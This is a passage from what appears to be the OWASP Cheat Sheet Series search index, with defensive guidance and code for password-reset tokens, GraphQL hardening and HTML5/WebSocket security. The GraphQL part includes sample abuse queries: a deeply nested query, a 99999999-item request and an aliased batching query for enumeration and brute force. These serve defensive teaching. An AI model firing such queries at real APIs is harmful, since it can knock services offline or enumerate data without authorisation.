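import java.security.SecureRandom;\nimport java.util.Base64;\n\npublic class ResetTokenGenerator {\nprivate static final SecureRandom RANDOM = new SecureRandom();\n\n//Generate a long, single-use, cryptographically random token to embed in the reset URL\npublic static String newToken() {\nbyte[] tokenBytes = new byte[32];\nRANDOM.nextBytes(tokenBytes);\nreturn Base64.getUrlEncoder().withoutPadding().encodeToString(tokenBytes);\n}\n}\n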

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#pins","title":"PINs","text":"

PINs are numbers (between 6 and 12 digits) that are sent to the user through a side-channel such as SMS.

  1. Generate a PIN (see the sketch after this list).
  2. Send it to the user via SMS or another mechanism.
  3. Breaking the PIN up with spaces makes it easier for the user to read and enter.
  4. The user then enters the PIN along with their username on the password reset page.
  5. Create a limited session from that PIN that only permits the user to reset their password.
  6. Let the user create a new password and confirm it. Ensure that the same password policy used elsewhere in the application is applied.
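
A minimal Java sketch of PIN generation with a CSPRNG (the class name and the zero-padded length are illustrative; delivery, expiry, and rate limiting are handled elsewhere):

import java.security.SecureRandom;\n\npublic class PinGenerator {\nprivate static final SecureRandom RANDOM = new SecureRandom();\n\n//Generate a zero-padded numeric PIN; 6 digits is only an example length\npublic static String newPin(int digits) {\nint bound = (int) Math.pow(10, digits);\nreturn String.format(\"%0\" + digits + \"d\", RANDOM.nextInt(bound));\n}\n}\n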
"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#offline-methods","title":"Offline Methods","text":"

Offline methods differ from other methods by allowing the user to reset their password without requesting a special identifier (such as a token or PIN) from the backend. However, authentication still needs to be conducted by the backend to ensure that the request is legitimate. Offline methods provide a certain identifier either on registration, or when the user wishes to configure it.

These identifiers should be stored offline and in a secure fashion (e.g. password managers), and the backend should properly follow the general security practices. Some implementations are built on hardware OTP tokens, certificates, or any other implementation that could be used inside of an enterprise. These are out of scope for this cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#backup-codes","title":"Backup Codes","text":"

Backup codes should be provided to the user upon registration, and the user should store them offline in a secure place (such as their password manager). Some companies that implement this method are Google, GitHub, and Auth0.

While implementing this method, the following practices should be followed:

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#security-questions","title":"Security Questions","text":"

Security questions should not be used as the sole mechanism for resetting passwords due to their answers frequently being easily guessable or obtainable by attackers. However, they can provide an additional layer of security when combined with the other methods discussed in this cheat sheet. If they are used, then ensure that secure questions are chosen as discussed in the Security Questions cheat sheet.

"},{"location":"cheatsheets/Forgot_Password_Cheat_Sheet.html#account-lockout","title":"Account Lockout","text":"

Accounts should not be locked out in response to a forgotten password attack, as this can be used to deny access to users with known usernames. For more details on account lockouts, see the Authentication Cheat Sheet.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html","title":"GraphQL Cheat Sheet","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introduction","title":"Introduction","text":"

GraphQL is an open source query language originally developed by Facebook that can be used to build APIs as an alternative to REST and SOAP. It has gained popularity since its inception in 2012 because of the native flexibility it offers to those building and calling the API. There are GraphQL servers and clients implemented in various languages. Many companies use GraphQL including GitHub, Credit Karma, Intuit, and PayPal.

This Cheat Sheet provides guidance on the various areas that need to be considered when working with GraphQL:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#common-attacks","title":"Common Attacks","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#best-practices-and-recommendations","title":"Best Practices and Recommendations","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#input-validation","title":"Input Validation","text":"

Adding strict input validation can help prevent against injection and DoS. The main design for GraphQL is that the user supplies one or more identifiers and the backend has a number of data fetchers making HTTP, DB, or other calls using the given identifiers. This means that user input will be included in HTTP requests, DB queries, or other requests/calls which provides opportunity for injection that could lead to various injection attacks or DoS.

See the OWASP Cheat Sheets on Input Validation and general injection prevention for full details to best perform input validation and prevent injection.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-practices","title":"General Practices","text":"

Validate all incoming data to only allow valid values (i.e. allow list).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#injection-prevention","title":"Injection Prevention","text":"

When handling input meant to be passed to another interpreter (e.g. SQL/NoSQL/ORM, OS, LDAP, XML):

For more information see the below pages:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#process-validation","title":"Process Validation","text":"

When using user input, even if sanitized and/or validated, it should not be used for certain purposes that would give a user control over data flow. For example, do not make an HTTP/resource request to a host that the user supplies (unless there is an absolute business need).

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dos-prevention","title":"DoS Prevention","text":"

DoS is an attack against the availability and stability of the API that can make it slow, unresponsive, or completely unavailable. This CS details several methods to limit the possibility of a DoS attack at the application level and other layers of the tech stack. There is also a CS dedicated to the topic of DoS.

Here are recommendations specific to GraphQL to limit the potential for DoS:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-limiting-depth-amount","title":"Query Limiting (Depth & Amount)","text":"

In GraphQL each query has a depth (e.g. nested objects) and each object requested in a query can have an amount specified (e.g. 99999999 of an object). By default these can both be unlimited, which may lead to a DoS. You should set limits on depth and amount to prevent DoS, but this usually requires a small custom implementation as it is not natively supported by GraphQL. See this and this page for more information about these attacks and how to add depth and amount limiting. Adding pagination can also help performance.

APIs using graphql-java can utilize the built-in MaxQueryDepthInstrumentation for depth limiting. APIs using JavaScript can use graphql-depth-limit to implement depth limiting and graphql-input-number to implement amount limiting.
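
For example, here is a minimal graphql-java sketch wiring MaxQueryDepthInstrumentation into the GraphQL runtime (the maximum depth of 10 and the class name are example assumptions):

import graphql.GraphQL;\nimport graphql.analysis.MaxQueryDepthInstrumentation;\nimport graphql.schema.GraphQLSchema;\n\npublic class DepthLimitedGraphQLFactory {\n//Reject any query deeper than 10 levels (example value)\npublic static GraphQL build(GraphQLSchema schema) {\nreturn GraphQL.newGraphQL(schema)\n.instrumentation(new MaxQueryDepthInstrumentation(10))\n.build();\n}\n}\n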

Here is an example of a GraphQL query with depth N:

query evil {            # Depth: 0\nalbum(id: 42) {       # Depth: 1\nsongs {             # Depth: 2\nalbum {           # Depth: 3\n...             # Depth: ...\nalbum {id: N}   # Depth: N\n}\n}\n}\n}\n

Here is an example of a GraphQL query requesting 99999999 of an object:

query {\nauthor(id: \"abc\") {\nposts(first: 99999999) {\ntitle\n}\n}\n}\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#timeouts","title":"Timeouts","text":"

Adding timeouts can be a simple way to limit how many resources any single request can consume. But timeouts are not always effective since they may not activate until a malicious query has already consumed excessive resources. Timeout requirements will differ by API and data fetching mechanism; there isn't one timeout value that will work across the board.

At the application level, timeouts can be added for queries and resolver functions. This option is usually more effective since the query/resolution can be stopped once the timeout is reached. GraphQL does not natively support query timeouts so custom code is required. See this blog post for more about using timeouts with GraphQL or the two examples below.

JavaScript Timeout Example

Code snippet from this SO answer:

request.incrementResolverCount =  function () {\nvar runTime = Date.now() - startTime;\nif (runTime > 10000) {  // a timeout of 10 seconds\nif (request.logTimeoutError) {\nlogger('ERROR', `Request ${request.uuid} query execution timeout`);\n}\nrequest.logTimeoutError = false;\nthrow 'Query execution has timeout. Field resolution aborted';\n}\nthis.resolverCount++;\n};\n

Java Timeout Example using Instrumentation

public class TimeoutInstrumentation extends SimpleInstrumentation {\n@Override\npublic DataFetcher<?> instrumentDataFetcher(\nDataFetcher<?> dataFetcher, InstrumentationFieldFetchParameters parameters\n) {\nreturn environment ->\nObservable.fromCallable(() -> dataFetcher.get(environment))\n.subscribeOn(Schedulers.computation())\n.timeout(10, TimeUnit.SECONDS)  // timeout of 10 seconds\n.blockingFirst();\n}\n}\n

Infrastructure Timeout

Another option to add a timeout that is usually easier is adding a timeout on an HTTP server (Apache/httpd, nginx), reverse proxy, or load balancer. However, infrastructure timeouts are often inaccurate and can be bypassed more easily than application-level ones.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-cost-analysis","title":"Query Cost Analysis","text":"

Query cost analysis involves assigning costs to the resolution of fields or types in incoming queries so that the server can reject queries that cost too much to run or will consume too many resources. This is not easy to implement and may not always be necessary, but it is the most thorough approach to preventing DoS. See \"Query Cost Analysis\" in this blog post for more details on implementing this control.

Apollo recommends:

Before you go ahead and spend a ton of time implementing query cost analysis be certain you need it. Try to crash or slow down your staging API with a nasty query and see how far you get \u2014 maybe your API doesn\u2019t have these kinds of nested relationships, or maybe it can handle fetching thousands of records at a time perfectly fine and doesn\u2019t need query cost analysis!

APIs using graphql-java can utilize the built-in MaxQueryComplexityInstrumentation to enforce max query complexity. APIs using JavaScript can utilize graphql-cost-analysis or graphql-validation-complexity to enforce max query cost.
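
As an illustration, a minimal graphql-java sketch enforcing a maximum query complexity (the limit of 100 and the class name are example assumptions):

import graphql.GraphQL;\nimport graphql.analysis.MaxQueryComplexityInstrumentation;\nimport graphql.schema.GraphQLSchema;\n\npublic class ComplexityLimitedGraphQLFactory {\n//Reject any query whose computed complexity exceeds 100 (example value)\npublic static GraphQL build(GraphQLSchema schema) {\nreturn GraphQL.newGraphQL(schema)\n.instrumentation(new MaxQueryComplexityInstrumentation(100))\n.build();\n}\n}\n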

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#rate-limiting","title":"Rate Limiting","text":"

Enforcing rate limiting on a per IP or user (for anonymous and unauthorized access) basis can help limit a single user's ability to spam requests to the service and impact performance. Ideally this can be done with a WAF, API gateway, or web server (Nginx, Apache/HTTPD) to reduce the effort of adding rate limiting.

Or you could get somewhat complex with throttling and implement it in your code (non-trivial). See \"Throttling\" here for more about GraphQL-specific rate limiting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#server-side-batching-and-caching","title":"Server-side Batching and Caching","text":"

To increase efficiency of a GraphQL API and reduce its resource consumption, the batching and caching technique can be used to prevent making duplicate requests for pieces of data within a small time frame. Facebook's DataLoader tool is one way to implement this.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#system-resource-management","title":"System Resource Management","text":"

Not properly limiting the amount of resources your API can use (e.g. CPU or memory) may compromise your API's responsiveness and availability, leaving it vulnerable to DoS attacks. Some limiting can be done at the operating system level.

On Linux, a combination of Control Groups (cgroups), User Limits (ulimits), and Linux Containers (LXC) can be used.

However, containerization platforms tend to make this task much easier. See the resource limiting section in the Docker Security Cheat Sheet for how to prevent DoS when using containers.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#access-control","title":"Access Control","text":"

To ensure that a GraphQL API has proper access control, do the following:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#general-data-access","title":"General Data Access","text":"

It's commonplace for GraphQL requests to include one or more direct IDs of objects in order to fetch or modify them. For example, a request for a certain picture may include the ID that is actually the primary key in the database for that picture. As with any request, the server must verify that the caller has access to the object they are requesting. But sometimes developers make the mistake of assuming that possession of the object's ID means the caller should have access. Failure to verify the requester's access in this case is called Broken Object Level Authorization, also known as IDOR.

It's possible for a GraphQL API to support access to objects using their ID even if that is not intended. Sometimes there are node or nodes or both fields in a query object, and these can be used to access objects directly by ID. You can check whether your schema has these fields by running this on the command-line (assuming that schema.json contains your GraphQL schema): cat schema.json | jq \".data.__schema.types[] | select(.name==\\\"Query\\\") | .fields[] | .name\" | grep node. Removing these fields from the schema should disable the functionality, but you should always apply proper authorization checks to verify the caller has access to the object they are requesting.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#query-access-data-fetching","title":"Query Access (Data Fetching)","text":"

As part of a GraphQL API there will be various data fields that can be returned. One thing to consider is if you want different levels of access around these fields. For example, you may only want certain consumers to be able to fetch certain data fields rather than allowing all consumers to be able to retrieve all available fields. This can be done by adding a check in the code to ensure that the requester should be able to read a field they are trying to fetch.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mutation-access-data-manipulation","title":"Mutation Access (Data Manipulation)","text":"

GraphQL supports mutation, or manipulation of data, in addition to its most common use case of data fetching. If an API implements/allows mutation then there may need to be access controls put in place to restrict which consumers, if any, can modify data through the API. Setups that require mutation access control would include APIs where only read access is intended for requesters or where only certain parties should be able to modify certain fields.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#batching-attacks","title":"Batching Attacks","text":"

GraphQL supports batching requests, also known as query batching. This lets callers either batch multiple queries or batch requests for multiple object instances in a single network call, which allows for what is called a batching attack. This is a form of brute force attack, specific to GraphQL, that usually allows for faster and less detectable exploits. Here is the most common way to do query batching:

[\n{\nquery: < query 0 >,\nvariables: < variables for query 0 >,\n},\n{\nquery: < query 1 >,\nvariables: < variables for query 1 >,\n},\n{\nquery: < query n >\nvariables: < variables for query n >,\n}\n]\n

And here is an example query of a single batched GraphQL call requesting multiple different instances of the droid object:

query {\ndroid(id: \"2000\") {\nname\n}\nsecond:droid(id: \"2001\") {\nname\n}\nthird:droid(id: \"2002\") {\nname\n}\n}\n

In this case it could be used to enumerate every possible droid object that is stored on the server in very few network requests as opposed to a standard REST API where the requester would need to submit a different network request for every different droid ID they want to request. This type of attack can lead to the following issues:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#mitigating-batching-attacks","title":"Mitigating Batching Attacks","text":"

In order to mitigate this type of attack you should put limits on incoming requests at the code level so that they can be applied per request. There are 3 main options:

One option is to create a code-level rate limit on how many objects that callers can request. This means the backend would track how many different object instances the caller has requested, so that they will be blocked after requesting too many objects even if they batch the object requests in a single network call. This replicates a network-level rate limit that a WAF or other tool would do.

Another option is to prevent batching for sensitive objects that you don't want to be brute forced, such as usernames, emails, passwords, OTPs, session tokens, etc. This way an attacker is forced to attack the API like a REST API and make a different network call per object instance. This is not supported natively so it will require a custom solution. However once this control is put in place other standard controls will function normally to help prevent any brute forcing.

Limiting the number of operations that can be batched and run at once is another option to mitigate GraphQL batching attacks leading to DoS. This is not a silver bullet though and should be used in conjunction with other methods.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#secure-configurations","title":"Secure Configurations","text":"

By default, most GraphQL implementations have some insecure default configurations which should be changed:

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#introspection-graphiql","title":"Introspection + GraphiQL","text":"

GraphQL often comes by default with introspection and/or GraphiQL enabled, without requiring authentication. This allows the consumer of your API to learn everything about your API, schemas, mutations, deprecated fields and sometimes unwanted \"private fields\".

This might be an intended configuration if your API is designed to be consumed by external clients, but can also be an issue if the API was designed to be used internally only. Although security by obscurity is not recommended, it might be a good idea to consider removing introspection to avoid any leak. If your API is publicly consumed, you might want to consider disabling introspection for unauthenticated or unauthorized users.

For internal APIs, the easiest approach is to just disable introspection system-wide. See this page or consult your GraphQL implementation's documentation to learn how to disable introspection altogether. If your implementation does not natively support disabling introspection or if you would like to allow some consumers/roles to have this access, you can build a filter in your service to only allow approved consumers to access the introspection system.

Keep in mind that even if introspection is disabled, attackers can still guess fields by brute forcing them. Furthermore, GraphQL has a built-in feature to return a hint when a field name that the requester provides is similar (but incorrect) to an existing field (e.g. request has usr and the response will ask Did you mean \"user?\"). You should consider disabling this feature if you have disabled the introspection, to decrease the exposure, but not all implementations of GraphQL support doing so. Shapeshifter is one tool that should be able to do this.

Disable Introspection - Java

GraphQLSchema schema = GraphQLSchema.newSchema()\n.query(StarWarsSchema.queryType)\n.fieldVisibility( NoIntrospectionGraphqlFieldVisibility.NO_INTROSPECTION_FIELD_VISIBILITY )\n.build();\n

Disable Introspection & GraphiQL - JavaScript

app.use('/graphql', graphqlHTTP({\nschema: MySessionAwareGraphQLSchema,\n+ validationRules: [NoIntrospection]\ngraphiql: process.env.NODE_ENV === 'development',\n}));\n
"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#dont-return-excessive-errors","title":"Don't Return Excessive Errors","text":"

GraphQL APIs in production shouldn't return stack traces or be in debug mode. Doing this is implementation specific, but using middleware is one popular way to have better control over errors the server returns. To disable excessive errors with Apollo Server, either pass debug: false to the Apollo Server constructor or set the NODE_ENV environment variable to 'production' or 'test'. However, if you would like to log the stack trace internally without returning it to the user see here for how to mask and log errors so they are available to the developers but not callers of the API.

"},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#other-resources","title":"Other Resources","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#tools","title":"Tools","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#graphql-security-best-practices-documentation","title":"GraphQL Security Best Practices + Documentation","text":""},{"location":"cheatsheets/GraphQL_Cheat_Sheet.html#more-on-graphql-attacks","title":"More on GraphQL Attacks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html","title":"HTML5 Security Cheat Sheet","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The following cheat sheet serves as a guide for implementing HTML 5 in a secure fashion.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#communication-apis","title":"Communication APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-messaging","title":"Web Messaging","text":"

Web Messaging (also known as Cross Domain Messaging) provides a means of messaging between documents from different origins in a way that is generally safer than the multiple hacks used in the past to accomplish this task. However, there are still some recommendations to keep in mind:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websockets","title":"WebSockets","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#server-sent-events","title":"Server-Sent Events","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#storage-apis","title":"Storage APIs","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#local-storage","title":"Local Storage","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#client-side-databases","title":"Client-side databases","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#geolocation","title":"Geolocation","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#web-workers","title":"Web Workers","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing","title":"Tabnabbing","text":"

This attack is described in detail in this article.

To summarize, it's the capacity to act on the parent page's content or location from a newly opened page, via the back link exposed by the opener JavaScript object instance.

It applies to an HTML link or a JavaScript window.open call that uses the target attribute/argument to specify a loading location that does not replace the current one, which leaves the current window/tab reachable from the newly opened page.

To prevent this issue, the following actions are available:

Cut the back link between the parent and the child pages:

As the behavior of the elements above differs between browsers, either use an HTML link or JavaScript to open the window (or tab), then use this configuration to maximize cross-browser support:

function openPopup(url, name, windowFeatures){\n//Open the popup and set the opener and referrer policy instruction\nvar newWindow = window.open(url, name, 'noopener,noreferrer,' + windowFeatures);\n//Reset the opener link\nnewWindow.opener = null;\n}\n
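
For the plain HTML link case, the same cut of the back link can be expressed with the rel attribute (URL and link text are illustrative):

<a href=\"https://example.com\" target=\"_blank\" rel=\"noopener noreferrer\">Example</a>\n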

Compatibility matrix:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#sandboxed-frames","title":"Sandboxed frames","text":"

It is possible to have a fine-grained control over iframe capabilities using the value of the sandbox attribute.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#credential-and-personally-identifiable-information-pii-input-hints","title":"Credential and Personally Identifiable Information (PII) Input hints","text":"

Consider accessing a financial account from a public computer. Even though one has logged off, the next person who uses the machine may be able to log in because of the browser's autocomplete functionality. To mitigate this, we tell the input fields not to assist in any way.

<input type=\"text\" spellcheck=\"false\" autocomplete=\"off\" autocorrect=\"off\" autocapitalize=\"off\"></input>\n

Text areas and input fields for PII (name, email, address, phone number) and login credentials (username, password) should be prevented from being stored in the browser. Use these HTML5 attributes to prevent the browser from storing PII from your form:

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#offline-applications","title":"Offline Applications","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#progressive-enhancements-and-graceful-degradation-risks","title":"Progressive Enhancements and Graceful Degradation Risks","text":""},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#http-headers-to-enhance-security","title":"HTTP Headers to enhance security","text":"

Consult the project OWASP Secure Headers in order to obtain the list of HTTP security headers that an application should use to enable defenses at the browser level.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#websocket-implementation-hints","title":"WebSocket implementation hints","text":"

In addition to the elements mentioned above, the following are the areas in which caution must be taken during implementation.

The sections below propose implementation hints for each area, accompanied by an example application showing all the points described.

The complete source code of the example application is available here.

"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#access-filtering","title":"Access filtering","text":"

During WebSocket channel initiation, the browser sends the Origin HTTP request header, which contains the source domain that initiated the handshake request. Even if this header can be spoofed in a forged HTTP request (not browser based), it cannot be overridden or forced in a browser context. It therefore represents a good candidate for applying filtering against an expected value.

An example of an attack using this vector, named Cross-Site WebSocket Hijacking (CSWSH), is described here.

The code below defines a configuration that applies filtering based on an \"allow list\" of origins. This ensures that only allowed origins can establish a full handshake:

import org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.server.ServerEndpointConfig;\nimport java.util.Arrays;\nimport java.util.List;\n\n/**\n * Setup handshake rules applied to all WebSocket endpoints of the application.\n * Use to setup the Access Filtering using \"Origin\" HTTP header as input information.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/index.html?javax/websocket/server/\n * ServerEndpointConfig.Configurator.html\"\n * @see \"https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Origin\"\n */\npublic class EndpointConfigurator extends ServerEndpointConfig.Configurator {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(EndpointConfigurator.class);\n\n/**\n     * Get the expected source origins from a JVM property in order to allow external configuration\n     */\nprivate static final List<String> EXPECTED_ORIGINS =  Arrays.asList(System.getProperty(\"source.origins\")\n.split(\";\"));\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic boolean checkOrigin(String originHeaderValue) {\nboolean isAllowed = EXPECTED_ORIGINS.contains(originHeaderValue);\nString safeOriginValue = Encode.forHtmlContent(originHeaderValue);\nif (isAllowed) {\nLOG.info(\"[EndpointConfigurator] New handshake request received from {} and was accepted.\",\nsafeOriginValue);\n} else {\nLOG.warn(\"[EndpointConfigurator] New handshake request received from {} and was rejected !\",\nsafeOriginValue);\n}\nreturn isAllowed;\n}\n\n}\n
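
The expected origins are read from the source.origins JVM system property (split on ;), so the allow list can be supplied at server startup, for example (illustrative origins and launch command):

java -Dsource.origins=\"https://app.example.org;https://admin.example.org\" -jar websocket-poc-server.jar\n
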
"},{"location":"cheatsheets/HTML5_Security_Cheat_Sheet.html#authentication-and-inputoutput-validation","title":"Authentication and Input/Output validation","text":"

When using WebSocket as a communication channel, it's important to use an authentication method that gives the user an access token which is not automatically sent by the browser and must therefore be sent explicitly by the client code during each exchange.

HMAC digests are the simplest method, and JSON Web Token (JWT) is a good feature-rich alternative, because it allows the transport of access ticket information in a stateless and tamper-proof way. Moreover, it defines a validity timeframe. You can find additional information about JWT token hardening on this cheat sheet.

JSON validation schemas are used to define and validate the expected content of input and output messages.

The code below defines the complete authentication messages flow handling:

Authentication Web Socket endpoint - Provide a WS endpoint that enables authentication exchange

import org.owasp.pocwebsocket.configurator.EndpointConfigurator;\nimport org.owasp.pocwebsocket.decoder.AuthenticationRequestDecoder;\nimport org.owasp.pocwebsocket.encoder.AuthenticationResponseEncoder;\nimport org.owasp.pocwebsocket.handler.AuthenticationMessageHandler;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.CloseReason;\nimport javax.websocket.OnClose;\nimport javax.websocket.OnError;\nimport javax.websocket.OnOpen;\nimport javax.websocket.Session;\nimport javax.websocket.server.ServerEndpoint;\n\n/**\n * Class in charge of managing the client authentication.\n *\n * @see \"http://docs.oracle.com/javaee/7/api/javax/websocket/server/ServerEndpointConfig.Configurator.html\"\n * @see \"http://svn.apache.org/viewvc/tomcat/trunk/webapps/examples/WEB-INF/classes/websocket/\"\n */\n@ServerEndpoint(value = \"/auth\", configurator = EndpointConfigurator.class,\nsubprotocols = {\"authentication\"}, encoders = {AuthenticationResponseEncoder.class},\ndecoders = {AuthenticationRequestDecoder.class})\npublic class AuthenticationEndpoint {\n\n/**\n     * Logger\n     */\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationEndpoint.class);\n\n/**\n     * Handle the beginning of an exchange\n     *\n     * @param session Exchange session information\n     */\n@OnOpen\npublic void start(Session session) {\n//Define connection idle timeout and message limits in order to mitigate as much as possible\n//DOS attacks using massive connection opening or massive big messages sending\nint msgMaxSize = 1024 * 1024;//1 MB\nsession.setMaxIdleTimeout(60000);//1 minute\nsession.setMaxTextMessageBufferSize(msgMaxSize);\nsession.setMaxBinaryMessageBufferSize(msgMaxSize);\n//Log exchange start\nLOG.info(\"[AuthenticationEndpoint] Session {} started\", session.getId());\n//Affect a new message handler instance in order to process the exchange\nsession.addMessageHandler(new AuthenticationMessageHandler(session.getBasicRemote()));\nLOG.info(\"[AuthenticationEndpoint] Session {} message handler affected for processing\",\nsession.getId());\n}\n\n/**\n     * Handle error case\n     *\n     * @param session Exchange session information\n     * @param thr     Error details\n     */\n@OnError\npublic void onError(Session session, Throwable thr) {\nLOG.error(\"[AuthenticationEndpoint] Error occur in session {}\", session.getId(), thr);\n}\n\n/**\n     * Handle close event\n     *\n     * @param session     Exchange session information\n     * @param closeReason Exchange closing reason\n     */\n@OnClose\npublic void onClose(Session session, CloseReason closeReason) {\nLOG.info(\"[AuthenticationEndpoint] Session {} closed: {}\", session.getId(),\ncloseReason.getReasonPhrase());\n}\n\n}\n

Authentication message handler - Handle all authentication requests

import org.owasp.pocwebsocket.enumeration.AccessLevel;\nimport org.owasp.pocwebsocket.util.AuthenticationUtils;\nimport org.owasp.pocwebsocket.vo.AuthenticationRequest;\nimport org.owasp.pocwebsocket.vo.AuthenticationResponse;\nimport org.owasp.encoder.Encode;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport javax.websocket.EncodeException;\nimport javax.websocket.MessageHandler;\nimport javax.websocket.RemoteEndpoint;\nimport java.io.IOException;\n\n/**\n * Handle authentication message flow\n */\npublic class AuthenticationMessageHandler implements MessageHandler.Whole<AuthenticationRequest> {\n\nprivate static final Logger LOG = LoggerFactory.getLogger(AuthenticationMessageHandler.class);\n\n/**\n     * Reference to the communication channel with the client\n     */\nprivate RemoteEndpoint.Basic clientConnection;\n\n/**\n     * Constructor\n     *\n     * @param clientConnection Reference to the communication channel with the client\n     */\npublic AuthenticationMessageHandler(RemoteEndpoint.Basic clientConnection) {\nthis.clientConnection = clientConnection;\n}\n\n\n/**\n     * {@inheritDoc}\n     */\n@Override\npublic void onMessage(AuthenticationRequest message) {\nAuthenticationResponse response = null;\ntry {\n//Authenticate\nString authenticationToken = \"\";\nString accessLevel = this.authenticate(message.getLogin(), message.getPassword());\nif (accessLevel != null) {\n//Create a simple JSON token representing the authentication profile\nauthenticationToken = AuthenticationUtils.issueToken(message.getLogin(), accessLevel);\n}\n//Build the response object\nString safeLoginValue = Encode.forHtmlContent(message.getLogin());\nif (!authenticationToken.isEmpty()) {\nresponse = new AuthenticationResponse(true, authenticationToken, \"Authentication succeed !\");\nLOG.info(\"[AuthenticationMessageHandler] User {} authentication succeed.\", safeLoginValue);\n} else {\nresponse = new AuthenticationResponse(false, authenticationToken, \"Authentication failed !\");\nLOG.warn(\"[AuthenticationMessageHandler] User {} authentication failed.\", safeLoginValue);\n}\n} catch (Exception e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in authentication process.\", e);\n//Build the response object indicating that authentication fail\nresponse = new AuthenticationResponse(false, \"\", \"Authentication failed !\");\n} finally {\n//Send response\ntry {\nthis.clientConnection.sendObject(response);\n} catch (IOException | EncodeException e) {\nLOG.error(\"[AuthenticationMessageHandler] Error occur in response object sending.\", e);\n}\n}\n}\n\n/**\n     * Authenticate the user\n     *\n     * @param login    User login\n     * @param password User password\n     * @return The access level if the authentication succeed or NULL if the authentication failed\n     */\nprivate String authenticate(String login, String password) {\n....\n}\n}\n

Utility class to manage the JWT token - Handles the issuing and validation of the access token. A simple JWT token is used for the example (the focus here is on the global WS endpoint implementation) without extra hardening (see this cheat sheet to apply extra hardening to the JWT token)

import com.auth0.jwt.JWT;\nimport com.auth0.jwt.JWTVerifier;\nimport com.auth0.jwt.algorithms.Algorithm;\nimport com.auth0.jwt.interfaces.DecodedJWT;\n\nimport java.io.IOException;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.Calendar;\nimport java.util.Locale;\n\n/**\n * Utility class to manage the authentication JWT token\n */\npublic class AuthenticationUtils {\n\n/**\n     * Build a JWT token for a user\n     *\n     * @param login       User login\n     * @param accessLevel Access level of the user\n     * @return The Base64 encoded JWT token\n     * @throws Exception If any error occur during the issuing\n     */\npublic static String issueToken(String login, String accessLevel) throws Exception {\n//Issue a JWT token with validity of 30 minutes\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nCalendar c = Calendar.getInstance();\nc.add(Calendar.MINUTE, 30);\nreturn JWT.create().withIssuer(\"WEBSOCKET-SERVER\").withSubject(login).withExpiresAt(c.getTime())\n.withClaim(\"access_level\", accessLevel.trim().toUpperCase(Locale.US)).sign(algorithm);\n}\n\n/**\n     * Verify the validity of the provided JWT token\n     *\n     * @param token JWT token encoded to verify\n     * @return The verified and decoded token with user authentication and\n     * authorization (access level) information\n     * @throws Exception If any error occur during the token validation\n     */\npublic static DecodedJWT validateToken(String token) throws Exception {\nAlgorithm algorithm = Algorithm.HMAC256(loadSecret());\nJWTVerifier verifier = 